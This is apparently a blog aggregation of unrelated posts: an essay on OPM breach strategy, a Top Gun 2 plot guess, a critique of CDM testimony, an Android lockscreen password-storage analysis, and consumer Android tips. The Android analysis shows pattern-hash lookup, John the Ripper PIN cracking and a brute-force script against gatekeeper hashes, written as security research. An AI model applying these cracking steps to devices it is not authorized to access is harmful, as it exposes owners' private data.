My Security Strategy: The “Third Way”

Over the last two weeks I listened to and watched all of the hearings related to the OPM breach. During the exchanges between the witnesses and legislators, I noticed several themes. One presented the situation facing OPM (and other Federal agencies) as confronting the following choice:

You can either 1) “secure your network,” which is very difficult and going to “take years,” due to “years of insufficient investment,” or 2) suffer intrusions and breaches, which is what happened to OPM.

This struck me as an odd dichotomy. The reasoning appeared to be that because OPM did not make “sufficient investment” in security, a breach was the result.

In other words, if OPM had “sufficiently invested” in security, they would not have suffered a breach.

I do not see the situation in this way, for two main reasons.

First, there is a difference between an “intrusion” and a “breach.” An intrusion is unauthorized access to a computing resource. A breach is the theft, alteration, or destruction of that computing resource, following an intrusion.

It therefore follows that one can suffer an intrusion, but not suffer a breach.

One can avoid a breach following an intrusion if the security team can stop the adversary before he accomplishes his mission.

Second, there is no point at which any network is “secure,” i.e., intrusion-proof. It is more likely one could operate a breach-proof network, but that is not completely attainable, either.

Still, the most effective strategy is a combination of preventing as many intrusions as possible, complemented by an aggressive detection and response operation that improves the chances of avoiding a breach, or at least minimizes the impact of a breach.

This is why I call “detection and response” the “third way” strategy. The first way, “secure your network” by making it “intrusion-proof,” is not possible. The second way, suffer intrusions and breaches, is not acceptable. Therefore, organizations should implement a third way strategy that stops as many intrusions as possible, but detects and responds to those intrusions that do occur, prior to their progression to breach status.

My Prediction for Top Gun 2 Plot

We’ve known for about a year that Tom Cruise is returning to his iconic “Maverick” role from Top Gun, and that drone warfare would be involved. A few days ago we heard a few more details in this Collider story:

[Producer David Ellison]: There is an amazing role for Maverick in the movie and there is no Top Gun without Maverick, and it is going to be Maverick playing Maverick. It is I don’t think what people are going to expect, and we are very, very hopeful that we get to make the movie very soon. But like all things, it all comes down to the script, and Justin is writing as we speak.

[Interviewer]; You’re gonna do what a lot of sequels have been doing now which is incorporate real use of time from the first one to now.

ELLISON and DANA GOLDBERG: Absolutely…

ELLISON:  As everyone knows with Tom, he is 100% going to want to be in those airplanes shooting it practically. When you look at the world of dogfighting, what’s interesting about it is that it’s not a world that exists to the same degree when the original movie came out. This world has not been explored. It is very much a world we live in today where it’s drone technology and fifth generation fighters are really what the United States Navy is calling the last man-made fighter that we’re actually going to produce so it’s really exploring the end of an era of dogfighting and fighter pilots and what that culture is today are all fun things that we’re gonna get to dive into in this movie.

What could the plot involve?

First, who is the adversary? You can’t have dogfighting without a foe. Consider the leading candidates:

  • Russia: Maybe. Nobody is fond of what President Putin is doing in Ukraine.
  • Iran: Possible, but Hollywood types are close to the Democrats, and they will not likely want to upset Iran if Secretary Kerry secures a nuclear deal.
  • China: No way. Studios want to release movies in China, and despite the possibility of aerial conflict in the East or South China Seas, no studio is going to make China the bad guy. In fact, the studio will want to promote China as a good guy to please that audience.
  • North Korea: No way. Prior to “The Interview,” this was a possibility. Not anymore!
My money is on an Islamic terrorist group, either unnamed, or possibly Islamic State. They don’t have an air force, you say? This is where the drone angle comes into play.
Here is my prediction for the Top Gun 2 plot.
Oil tankers are trying to pass through the Gulf of Aden, or maybe the Strait of Hormuz, carrying their precious cargo. Suddenly a swarm of small, yet armed, drones attack and destroy the convoy, setting the oil ablaze in a commercial and environmental disaster. The stock market suffers a huge drop and gas prices skyrocket.
The US Fifth Fleet, and its Chinese counterpart, performing counter-piracy duties nearby, rush to rescue the survivors. They set up joint patrols to guard other commercial sea traffic. Later the Islamic group sends another swarm of drones to attack the American and Chinese ships. This time the enemy includes some sort of electronic warfare-capable drones that jam US and Chinese GPS, communications, and computer equipment. (I’m seeing a modern “Battlestar Galactica” theme here.) American and Chinese pilots die, and their ships are heavily damaged. (By the way, this is Hollywood, not real life.)
The US Navy realizes that its “net-centric,” “technologically superior” force can’t compete with this new era of warfare. Cue the similarities with the pre-Fighter Weapons School, early Vietnam situation described in the first scenes at Miramar in the original movie. (Remember, a 12-1 kill ratio in Korea, 3-1 in early Vietnam due to reliance on missiles and atrophied dogfighting skills, back to 12-1 in Vietnam after Top Gun training?)

The US Navy decides it needs to bring back someone who thinks unconventionally in order to counter the drone threat and resume commercial traffic in the Gulf. They find Maverick, barely hanging on to a job teaching at a civilian flight school. His personal life is a mess, and he was kicked out of the Navy during the first Gulf War in 1991 for breaking too many rules. Now the Navy wants him to teach a new generation of pilots how to fight once their “net-centric crutches” disappear.

You know what happens next. Maverick returns to the Navy as a contractor. Top Gun is now the Naval Strike and Air Warfare Center (NSAWC) at NAS Fallon, Nevada. The Navy retired his beloved F-14 in 2006, so there is a choice to be made about what aircraft awaits him in Nevada. I see three possibilities:

1) The Navy resurrects the F-14 because it’s “not vulnerable” to the drone electronic warfare. This would be cool, but they aren’t going to be able to fly American F-14s due to their retirement. CGI maybe?

2) The Navy flies the new F-35, because it’s new and cool. However, the Navy will probably not have any to fly. CGI again?

3) The Navy flies the F-18. This is most likely, because producers could film live operations as they did in the 1980s.

Beyond the aircraft issues, I expect themes involving relevance as one ages, re-integration with military culture, and possibly friction between members of the joint US-China task force created to counter the Islamic threat.

In the end, thanks to the ingenuity of Maverick’s teaching and tactics, the Americans and Chinese prevail over the Islamic forces. It might require Maverick to make the ultimate sacrifice, showing he’s learned that warfare is a team sport, and that he really misses Goose. The Chinese name their next aircraft carrier the “Pete Mitchell” in honor of Maverick’s sacrifice. (Forget calling it the “Maverick” — too much rebellion for the CCP.)

I’m looking forward to this movie.

Hearing Witness Doesn’t Understand CDM

This post is a follow up to this post on CDM. Since that post I have been watching hearings on the OPM breach.

On Wednesday 24 June a Subcommittee of the House Committee on Homeland Security held a hearing titled DHS’ Efforts to Secure .Gov.

A second panel (starts in the Webcast around 2 hours 20 minutes) featured Dr. Daniel M. Gerstein, a former DHS official now with RAND, as its sole witness.

During his opening statement, and in his written testimony, he made the following comments:

“The two foundational programs of DHS’s cybersecurity program are EINSTEIN (also called EINSTEIN 3A) and CDM. These two systems are designed to work in tandem, with EINSTEIN focusing on keeping threats out of federal networks and CDM identifying them when they are inside government networks.

EINSTEIN provides a perimeter around federal (or .gov) users, as well as select users in the .com space that have responsibility for critical infrastructure. EINSTEIN functions by installing sensors at Web access points and employs signatures to identify cyberattacks.

CDM, on the other hand, is designed to provide an embedded system of sensors on internal government networks. These sensors provide real-time capacity to sense anomalous behavior and provide reports to administrators through a scalable dashboard. It is composed of commercial-off-the-shelf equipment coupled with a customized dashboard that can be scaled for administrators at each level.” (emphasis added)

All of the text in bold is false. CDM is not “identifying [threats] when they are in inside government networks.” CDM is not “an embedded system of sensors on internal government networks” looking for threat actors.

Why does Dr. Gerstein so misunderstand the CDM program? The answer is found in the next section of his testimony, reproduced below.

“CDM operates by providing

          federal departments and agencies with capabilities and tools that identify
          cybersecurity risks on an ongoing basis, prioritize these risks based upon
          potential impacts, and enable cybersecurity personnel to mitigate the
          most significant problems first. Congress established the CDM program
          to provide adequate, risk-based, and cost-effective cybersecurity and
          more efficiently allocate cybersecurity resources.” (emphasis added)

The indented section is reproduced from the DHS CDM Website, as footnoted in Dr. Gerstein’s statement.

The answer to my question of misunderstanding involves two levels of confusion.

The first level of confusion is a result of the the CDM description, which confuses risks with vulnerabilities. Basically, the CDM description should say vulnerabilities instead of risks. CDM, now known as Continuous Diagnostics and Mitigation, is a “find and fix flaws (i.e., vulnerabilities) faster” program.

In other words, the CDM description should say:

“CDM gives federal departments and agencies with capabilities and tools that identify cybersecurity vulnerabilities on an ongoing basis, prioritize these vulnerabilities based upon potential impacts, and enable cybersecurity personnel to mitigate the most significant problems first.”

The second level of confusion is a result of Dr. Gerstein confusing risks with threats. It is clear that when Dr. Gerstein reads the CDM description and its mention of “risks,” he thinks CDM is looking for threat actors. CDM does not look for threat actors; CDM looks for vulnerabilities. Vulnerabilities are flaws in software or configuration that make it possible for intruders to gain unauthorized access.

As I wrote in my CDM post, we absolutely need the capability to find and fix flaws faster. We need CDM. However, do not confuse CDM with the operational capability to detect and remove threat actors. CDM could be deployed across the entire Federal government, but it would be an accident if a security analyst noticed an intruder using a CDM tool.

Essentially, the government needs to implement My Federal Government Security Crash Program to detect and remove threat actors.

It is critical that staffers, lawmakers, and the public understand what is happening, and not be lulled into a false sense of security due to misunderstanding these concepts.

Password storage in Android M

While Android has received a number of security enhancements in the last few releases, the lockscreen (also know as the keyguard) and password storage have remained virtually unchanged since the 2.x days, save for adding multi-user support. Android M is finally changing this with official support for fingerprint authentication. While the code related to biometric support is currently unavailable, some of the new code responsible for password storage and user authentication is partially available in AOSP’s master branch. Examining the runtime behaviour and files used by the current Android M preview reveals that some password storage changes have already been deployed. This post will briefly review how password storage has been implemented in pre-M Android versions, and then introduce the changes brought about by Android M.

Keyguard unlock methods

Stock Android provides three keyguard unlock methods: pattern, PIN and password (Face Unlock has been rebranded to ‘Trusted face’ and moved to the proprietary Smart Lock extension, part of Google Play Services). The pattern unlock is the original Android unlock method, while PIN and password (which are essentially equivalent under the hood) were added in version 2.2. The following sections will discuss how credentials are registered, stored and verified for the pattern and PIN/password unlock methods.

Pattern unlock

Android’s pattern unlock is entered by joining at least four points on a 3×3 matrix (some custom ROMs allow a bigger matrix). Each point can be used only once (crossed points are disregarded) and the maximum number of points is nine. The pattern is internally converted to a byte sequence, with each point represented by its index, where 0 is top left and 8 is bottom right. Thus the pattern is similar to a PIN with a minimum of four and maximum of nine digits which uses only nine distinct digits (0 to 8). However, because points cannot be repeated, the number of variations in an unlock pattern is considerably lower compared to those of a nine-digit PIN. As pattern unlock is the original and initially sole unlock method supported by Android, a fair amount of research has been done about it’s (in)security. It has been shown that patterns can be guessed quite reliably using the so called smudge attack, and that the total number of possible combinations is less than 400 thousand, with only 1624 combinations for 4-dot (the default) patterns.

Android stores an unsalted SHA-1 hash of the unlock pattern in /data/system/gesture.key or /data/system/users/<user ID>/gesture.key on multi-user devices. It may look like this for the ‘Z’ pattern shown in the screenshot above.

$ od -tx1 gesture.key
0000000 6a 06 2b 9b 34 52 e3 66 40 71 81 a1 bf 92 ea 73
0000020 e9 ed 4c 48

Because the hash is unsalted, it is easy to precompute the hashes of all possible combinations and recover the original pattern instantaneously. As the number of combinations is fairly small, no special indexing or file format optimizations are required for the hash table, and the grep and xxd commands are all you need to recover the pattern once you have the gesture.key file.

$ grep `xxd -p gesture.key` pattern_hashes.txt
00010204060708, 6a062b9b3452e366407181a1bf92ea73e9ed4c48

PIN/password unlock

The PIN/password unlock method also relies on a stored hash of the user’s credential, however it also uses a 64-bit random, per-user salt. The salt is stored in the locksettings.db SQLite database, along with other settings related to the lockscreen. The password hash is kept in the /data/system/password.key file, which contains a concatenation of the password’s SHA-1 and MD5 hash values. The file’s contents may look like this:

$ cat password.key && echo
2E704465DB8C3CBFF085D8A5135A6F3CA32D5A2CA4A628AE48E22443250C30A3E1449BD0

Note that the hashes are not nested, but their values are simply concatenated, so if you were to bruteforce the password, you only need to attack the weaker hash — MD5. Another helpful fact is that in order to enable password auditing, Android stores details about the current PIN/password’s format in the device_policies.xml file, which might look like this:

<policies setup-complete="true">
...
<active-password length="6" letters="0" lowercase="0" nonletter="6"
numeric="6" quality="196608" symbols="0" uppercase="0">
</active-password>
</policies>

If you were able to obtain the password.key file, chances are that you would also have the device_policies.xml file. This file gives you enough information to narrow down the search space considerably when recovering the password by specifying a mask or password rules. For example, we can easily recover the following 6-digit pin using John the Ripper (JtR) in about a second by specifying the ?d?d?d?d?d?d mask and using the ‘dynamic’ MD5 hash format (hashcat has a dedicated Android PIN hash mode), as shown below . An 8-character (?l?l?l?l?l?l?l?l), lower case only password takes a couple of hours on the same hardware.

$ cat lockscreen.txt
user:$dynamic_1$A4A628AE48E22443250C30A3E1449BD0$327d5ce3f570d2eb

$ ./john --mask=?d?d?d?d?d?d lockscreen.txt
Loaded 1 password hash (dynamic_1 [md5($p.$s) (joomla) 128/128 AVX 480x4x3])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
456987 (user)
1g 0:00:00:00 DONE 6.250g/s 4953Kp/s 4953Kc/s 4953KC/s 234687..575297

Android’s lockscreen password can be easily reset by simply deleting the gesture.key and password.key files, so you might be wondering what is the point in trying to bruteforce it. As discussed in previous posts, the lockscreen password is used to derive keys that protect the keystore (if not hardware-backed), VPN profile passwords, backups, as well as the disk encryption key, so it might be valuable if trying to extract data from any of these services. And of course, the chance that a particular user is using the same pattern, PIN or password on all of their devices is quite high.

Gatekeeper password storage

We briefly introduced Android M’s gatekeeper daemon in the keystore redesign post in relation to per-key authorization tokens. It turns out the gatekeeper does much more than that and is also responsible for registering (called ‘enrolling’) and verifying user passwords. Enrolling turns a plaintext password into a so called ‘password handle’, which is an opaque, implementation-dependent byte string. The password handle can then be stored on disk and used to check whether a user-supplied password matches the currently registered handle. While the gatekeeper HAL does not specify the format of password handles, the default software implementation uses the following format:

typedef uint64_t secure_id_t;
typedef uint64_t salt_t;

static const uint8_t HANDLE_VERSION = 2;
struct __attribute__ ((__packed__)) password_handle_t {
// fields included in signature
uint8_t version;
secure_id_t user_id;
uint64_t flags;

// fields not included in signature
salt_t salt;
uint8_t signature[32];

bool hardware_backed;
};

Here secure_id_t is randomly generated, 64-bit secure user ID, which is persisted in the /data/misc/gatekeeper directory in a file named after the user’s Android user ID (*not* Linux UID; 0 for the primary user). The signature format is left to the implementation, but AOSP’s commit log reveals that it is most probably scrypt for the current default implementation. Other gatekeeper implementations might opt to use a hardware-protected symmetric or asymmetric key to produce a ‘real’ signature (or HMAC).

Neither the HAL, nor the currently available AOSP source code specifies where password handles are to be stored, but looking through the /data/system directory reveals the following files, one of which happens to be the same size as the password_handle_t structure. This implies that it likely contains a serialized password_handle_t instance.

# ls -l /data/system/*key
-rw------- system system 57 2015-06-24 10:24 gatekeeper.gesture.key
-rw------- system system 0 2015-06-24 10:24 gatekeeper.password.key

That’s quite a few assumptions though, so time to verify them by parsing the gatekeeper.gesture.key file and checking if the signature field matches the scrypt value of our lockscreen pattern (00010204060708 in binary representation). We can do so with the following Python code:

$ cat m-pass-hash.py
...
N = 16384;
r = 8;
p = 1;

f = open('gatekeeper.gesture.key', 'rb')
blob = f.read()

s = struct.Struct('<'+'17s 8s 32s')
(meta, salt, signature) = s.unpack_from(blob)
password = binascii.unhexlify('00010204060708');
to_hash = meta
to_hash += password
hash = scrypt.hash(to_hash, salt, N, r, p)

print 'signature %s' % signature.encode('hex')
print 'Hash: %s' % hash[0:32].encode('hex')
print 'Equal: %s' % (hash[0:32] == signature)

$./m-pass-hash.py
signature: 3d1a20985dec4bd937e5040aadb465fc75542c71f617ad090ca1c0f96950a4b8
Hash: 3d1a20985dec4bd937e5040aadb465fc75542c71f617ad090ca1c0f96950a4b8
Equal: True

The program output above leads us to believe that the ‘signature’ stored in the password handle file is indeed the scrypt value of the blob’s version, the 64-bit secure user ID, and the blob’s flags field, concatenated with the plaintext pattern value. The scrypt hash value is calculated using the stored 64-bit salt and the scrypt parameters N=16384, r=8, p=1. Password handles for PINs or passwords are calculated in the same way, using the PIN/password string value as input.

With this new hashing scheme patterns and passwords are treated in the same way, and thus patterns are no longer easier to bruteforce. That said, with the help of the device_policies.xml file which gives us the length of the pattern and a pre-computed pattern table, one can drastically reduce the number of patterns to try, as most users are likely to use 4-6 step patterns (about 35,000 total combinations) .

Because Androd M’s password hashing scheme doesn’t directly use the plaintext password when calculating the scrypt value, optimized password recovery tools such as hashcat or JtR cannot be used directly to evaluate bruteforce cost. It is however fairly easy to build our own tool in order to check how a simple PIN holds against a brute force attack, assuming both the device_policies.xml and gatekeeper.password.key files have been obtained. As can be seen below, a simple Python script that tries all PINs from 0000 to 9999 in order takes about 10 minutes, when run on the same hardware as our previous JtR example (a 6-digit PIN would take about 17 hours with the same program). Compare this to less than a second for bruteforcing a 6-digit PIN for Android 5.1 (and earlier), and it is pretty obvious that the new hashing scheme Android M introduces greatly improves password storage security, even for simple PINs. Of course, as we mentioned earlier, the gatekeeper daemon is part of Android’s HAL, so vendors are free to employ even more (or less…) secure gatekeeper implementations.

$ time ./m-pass-hash.py gatekeeper.password.key 4
Trying 0000...
Trying 0001...
Trying 0002...

...
Trying 9997...
Trying 9998...
Trying 9999...
Found PIN: 9999

real 9m46.118s
user 9m6.804s
sys 0m39.107s

Framework API

Android M is still in preview, so framework APIs are hardly stable, but we’ll show the gatekeeper’s AIDL interface for completeness. In the current preview release it is called IGateKeeperService and look likes this:

interface android.service.gatekeeper.IGateKeeperService {

void clearSecureUserId(int uid);

byte[] enroll(int uid, byte[] currentPasswordHandle,
byte[] currentPassword, byte[] desiredPassword);

long getSecureUserId(int uid);

boolean verify(int uid, byte[] enrolledPasswordHandle, byte[] providedPassword);

byte[] verifyChallenge(int uid, long challenge,
byte[] enrolledPasswordHandle, byte[] providedPassword);
}

As you can see, the interface provides methods for generating/getting and clearing the secure user ID for a particular user, as well as the enroll(), verify() and verifyChallenge() methods whose parameters closely match the lower level HAL interface. To verify that there is a live service that implements this interface, we can try to call the getSecureUserId() method using the service command line utility like so:

$ service call android.service.gatekeeper.IGateKeeperService 4 i32 0
Result: Parcel(00000000 ee555c25 ea679e08 '....%U...g.')

This returns a Binder Parcel with the primary user’s (user ID 0) secure user ID, which matches the value stored in /data/misc/gatekeeper/0 shown below (stored in network byte order).

# od -tx1 /data/misc/gatekeeper/0
37777776644 25 5c 55 ee 08 9e 67 ea
37777776644

The actual storage of password hashes (handles) is carried out by the LockSettingsService (interface ILockSettings), as in previous versions. The service has been extended to support the new gatekeeper password handle format, as well as to migrate legacy hashes to the new format. It is easy to verify this by calling the checkPassword(String password, int userId) method which returns true if the password matches:

# service call lock_settings 11 s16 1234 i32 0
Result: Parcel(00000000 00000000 '........')
# service call lock_settings 11 s16 9999 i32 0
Result: Parcel(00000000 00000001 '........')

Summary

Android M introduces a new system service — gatekeeper, which is responsible for converting plain text passwords to opaque binary blobs (called password handles) which can be safely stored on disk. The gatekeeper is part of Android’s HAL, so it can be modified to take advantage of the device’s native security features, such as secure storage or TEE, without modifying the core platform. The default implementation shipped with the current Android M preview release uses scrypt to hash unlock patterns, PINs or passwords, and provides much better protection against bruteforceing than the previously used single-round MD5 and SHA-1 hashes. 

Minimize Risk with These 5 Android Security Tips

Have you ever watched the show ‘MythBusters?’ Each week, the show’s hosts band together to get to the bottom of questions such as: ‘Is running better than walking to keep dry in the rain?’

Today, we’re going to follow suit and bust some myths of our own – each one pertaining to Android security, of course!

Whether it’s the latest mobile malware development or a new mobile security flaw, the security landscape is ever-changing. It’s time to take matters into your own hands and protect yourself by following these tips:

  1. Never ‘root’ your Android devices

While it can be tempting to ‘root’ your Android device, a process that allows you to access the entire operating system and customize anything on your Android, you never should. Doing this makes your mobile phone a bigger target, since it’s easier for malware to act on devices with administrator level access.

  1. Don’t focus exclusively on malware

A number of Android risks, such as misplaced usernames and passwords or poor use of encryption, are overlooked by traditional malware-only security strategies. Additionally, bad apps can mine your personal data or gain access to your phone functions. McAfee® Mobile Security is free for both Android and iOS, and offers a variety of protections to keep unwanted people and apps out of your devices.

  1. Stick to official app stores for all your mobile needs

Want to download a new app or update the software on your mobile device? Do it from an official app store. Third-party app stores are breeding grounds for malicious apps and faulty software that could wreak havoc on your mobile device.

  1. Keep a close eye on mobile app permissions

Are your mobile apps requesting more than they need to operate on a basic level? They shouldn’t be! Always think twice before downloading an app that unjustifiably requests access to things like SMS messaging, your contacts or location services.

  1. Update your Android software and firmware regularly

Make it a habit to consistently check on available software updates for your Android device. The newer the version, the better chance you have at keeping hackers out of your mobile device.

There you have it – Android mobile security myths busted and facts laid out in one place. Now, it’s up to you to follow them!

To keep up with the latest security threats, make sure to follow @IntelSec_Home on Twitter and like us on Facebook.

lianne-caetano